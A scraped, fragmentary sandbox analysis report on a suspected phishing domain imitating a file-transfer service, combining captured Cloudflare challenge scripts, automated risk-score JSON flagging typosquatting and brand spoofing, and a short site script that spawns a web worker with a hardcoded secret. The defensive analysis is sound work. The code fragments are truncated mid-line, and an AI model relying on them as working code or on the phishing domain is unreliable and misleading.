cH: '8OnRI47Agr_I_5vsTIpze9t_4PEjnlPxmJo6eMmT38k-1736862682-1.1.1.1-dilAwC.Pj_jLUHTnZHfbrZ2ARgIt8veAvSqivn_xJICoftynRKWYbttRVFYHM2HI',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'light',
wS: 'normal',
md: 'H29wdt7ARaL_RBQ5oWl73Lximwt68QRsjnBpr01QJ0k-1736862682-1.1.1.1-pddfw0CiOvwhnNXG0SB0u1cH_HBiHMkZse1wz3CxaJv0KMc54fF5c2m_qSaox76HJnUibyXV0n07r50_4F2J9WXjGjU5EPf1WHYQmk8EKZ27YPrlAv5htyIhfLKyvMFRPgblPCjzFi7w._Jy7he0BvvYNeNIB3ulBcxz4tKUXjDofcal80WHh6y.Sv8Yn.4rV19VDRIOjSGvH9dE1xKP_mBcuSGG6mVO1H6PEB7fSXWW473gRmEbxHqsmw9yM66jJ0jWSqipXcgii.diwvC8mz8cHyeo4EjjSS82X0A1GM5E8BWZ1lSFbYdAl1N6p.Hh.MQz2kGpRVOXeZljLQRJqWhFFnKrsyRhqVxgOde6lRRQUfkbaV.sJsYjAmCj32r9kAGUu_EAen8KCkhLyU5nAizpNAlHL7tTAhlzRhT99ib4NPOX4Y.EMO1.OTWKzuRGTYNUrJHk8_HhI0o9XSt6ETy9RkHNLPfANCSc0oRH20n0Lm77fcbvmIKtpWI5vdmCHRpjd_A9MjC_3PtWEhQAV1g.X3ZsG6ZkfiaIobZ7ymJvjbvBaq7cHYUZ6AST4zUzmqo.PCX1Df8WBUIsFwV8mIvXE3KiisUHa6oCGg9KS_W8uiN9G3NW_53QpZA3YIF1N1CHXVsm6mfiEC3mELCINlEit243WBiIEXzeNz545gavLfPL5clxRCPHQJ.N9Zc5e4UaC18K4SN28Am4mz7OtxveXOTbDdWoHLbDUBZIqC1DWl.QC1F5j4syYFnUHP_b7em0nXYBIgHpwahSd_rblqVLEqbCcr2jh87JO.6HCrhMOB9pcPuIapbq8nYi8Nna8.sca6IpdjzG.7XpE0cjTQ._1K58AhWKNXOt7VDEE.oaDACrkYlRZUO9M5xFH2WUl7vCoy1iR0o7rhRFxQ7dohUubyFFOxIH3zS_E4KjRRtxoG3X7j6lrn2OosVDzg1.ebjgGCemJ_drjg_uBzikL9Z9FkkOyZw42mmy2z98Saem5SKyVOFW0yvm.1BGpMIGwLxEMKi6sYNZrcUZVSU..S9xgpkLUG6u.CzglrYOttdwJ9wceJ2XGtMKN4z.v9AJ2.CZwYed71TvRR7Vac7MeMpHOk3VfXtn4fkHaKEDUGV3mQXBrRMsDQ26uXxc8aoXooisSDPtJQk3vaVZqRmpYdvtpr42PMj4Pcgr2LVtp6rpsv8VNI11wLzTnH1aHrDT.GaZqrNv.bp6FmxfEeS0ibu_2Cex..IXsEDfTmPKMYVdmamLiq.cFAal5GoP5Su9kYmqGtIOU4pkO9zYJ3HL2BPzELYDMNmknyAYGn18Ll4HGc6TeCQF74AWMjOGul7yGmx3Umqh0lzGgstF5BO9FCMVD0dP3pi2A8XEIg_FaV6TWXCU06nmlKp0j_zLVibtE3YZg_NHu.2R.6j0TEPJJDNArKoNTKH3zFr2CwIJdf_rpzz5pivy2FlpCTF.5MvQQ0UzrWZ7SL4C0Yvr5FIdzUrbIIYLqqqyp3zUssNYMRiGL9Fsq.qFGYbfJJ.CnuabLed9ERWkqIxnWL1gwhqwgf4kCBAJz1Uu5cP0SDqdfF35pepqQp_S7HfLKjzYGh_KblQEqjRtnjwZltYHRZgV3fwUiiFejSoPewhYM.puZ8DnKQ3VXPdU2rT2w4dCj1hb6r0cqtWjTWj9mc9smFMPuGkp3MxMS5fO7paduzj2vN6jFizik8yn1VwG8HvO5m2eW2qlAbg3kGNVEDhfgw6BZdcTXmF.ZyR3Aj5ZuFoBmi.n1.JeDrUDIwNIFdxGCAcy',
cITimeS: '1736862682',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'ribf8',
nextRcV: 'UZ7Btd2p2jHYmD6HaF8aAbZAXsof6o_I0gcoJhsQs5s-1736862682-1.3.1.1-reotf1N4SyjkrBJBregMeZtDaqqblUVnoL1t5UwxypU',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: windo |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. The script does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script is primarily responsible for handling the Cloudflare challenge and providing translations for various messages. This behavior is consistent with a legitimate security mechanism and does not pose a significant security risk."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F"},"translations":{"outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_feedback_report":"Having%20trouble%3F","turnstile_timeout":"Timed%20out","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_verifying":"Verifying...","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_footer_terms":"Terms","human_button_text":"Verify%20you%20are%20human","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_footer_privacy":"Privacy","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","testing_only":"Testing%20only.","turnstile_success":"Success%21","turnstile_feedback_description":"Send%20Feedback","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_refresh":"Refresh","turnstile_failure":"Error","turnstile_overrun_description":"Stuck%20here%3F","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_expired":"Expired"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eP,eQ,eU,eV,eY,eZ,fs,fv,fy,fA,fB,fC,fO,g0,g6,g7,g8,gi,gt,gx,gE,eW,eX){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(670))/1*(-parseInt(gI(266))/2)+-parseInt(gI(970))/3+-parseInt(gI(464))/4*(-parseInt(gI(141))/5)+parseInt(gI(188))/6*(parseInt(gI(1198))/7)+-parseInt(gI(191))/8+-parseInt(gI(911))/9+parseInt(gI(223))/10*(parseInt(gI(732))/11),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,772380),eM=this||self,eN=eM[gJ(418)],eO=function(gK,d,e,f,g){return gK=gJ,d={'nMBrm':gK(656),'tQCRS':function(h,i){return h^i},'sUNNj':function(h,i){return i^h},'nYdIz':function(h,i){return h-i},'fTGne':function(h,i){return h&i},'gBvkP':function(h,i){return i===h},'uYtFD':gK(839),'JEWCX':function(h,i){return i&h},'VEXaO':function(h,i){return h>>i},'yZHkL':function(h,i){return i*h},'aRUSP':function(h,i){return h+i},'wVnQZ':function(h,i){return h>>i},'ioIpr':function(h,i){return h&i},'MPEKN':function(h,i){return h+i},'Nexvg':function(h,i){return h^i},'iCcCJ':function(h,i){return h===i},'QGgTq':function(h,i){return h<i},'hcelI':function(h,i){return h<<i},'dKoTd':function(h,i){return h-i},'dEXRH':function(h,i){return h^i},'cYBnx':function(h,i){return h&i},'DgykX':function(h,i){return i^h},'vqTJB':function(h,i){return h^i},'UHeZX':function(h,i){return i&h},'MmhkE':function(h,i){return h&i},'aDGnB':function(h,i){return i===h},'anpJq':function(h,i){return h+i},'oeopz':function(h,i){return h^i},'fxPcI':function(h,i){return h-i},'HLJqW':function(h,i){return h^i},'iVcgA':function(h,i){return h-i},'odPpK':function(h,i){return i^h},'qDlcK':function(h,i){return h<i},'icIBN':function(h,i){return |
| URL: https://ar24consultation.wetransssecudoc.com Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://ar24consultation.wetransssecudoc.com |
| URL: https://challenges.cloudflare.com/turnstile/v0/b/e... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script appears to be a utility or helper library with no high-risk behaviors such as dynamic code execution or data exfiltration. It does not interact with external domains or perform aggressive DOM manipulations. The code is not obfuscated, and there are no suspicious domain interactions. It primarily consists of function definitions and utility methods, which are common in JavaScript libraries."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://ar24consultation.wetransssecudoc.com/MXq8H... Model: Joe Sandbox AI | {
"risk_score": 5,
"reasoning": "The script demonstrates moderate-risk behaviors, including the use of a SharedWorker or Worker to execute remote code. While this is not inherently malicious, it could potentially be used for malicious purposes if the code executed within the worker is not trustworthy. Additionally, the presence of a hardcoded secret code raises some concerns about potential data exfiltration or other suspicious activities. Further review of the worker code and the overall context of the application would be necessary to determine the full extent of the risk."
} |
window.secretCode="5eef648e64b136e53a28456a033fa5c8";
//Load WebWroker :
window.shworker=null;
var blob = new Blob([
document.querySelector('#worker1').textContent
], { type: "text/javascript" });
if(window.SharedWorker)window.shworker = new SharedWorker(window.URL.createObjectURL(blob));
else if(window.Worker)window.shworker = new Worker(window.URL.createObjectURL(blob));
|
| URL: https://ar24consultation.wetransssecudoc.com/MXq8HKfy-eg5TXl6di/index.html Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Please complete the security check !",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://ar24consultation.wetransssecudoc.com/MXq8HKfy-eg5TXl6di/index.html Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
Edit tour
chrome.exe (PID: 304 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node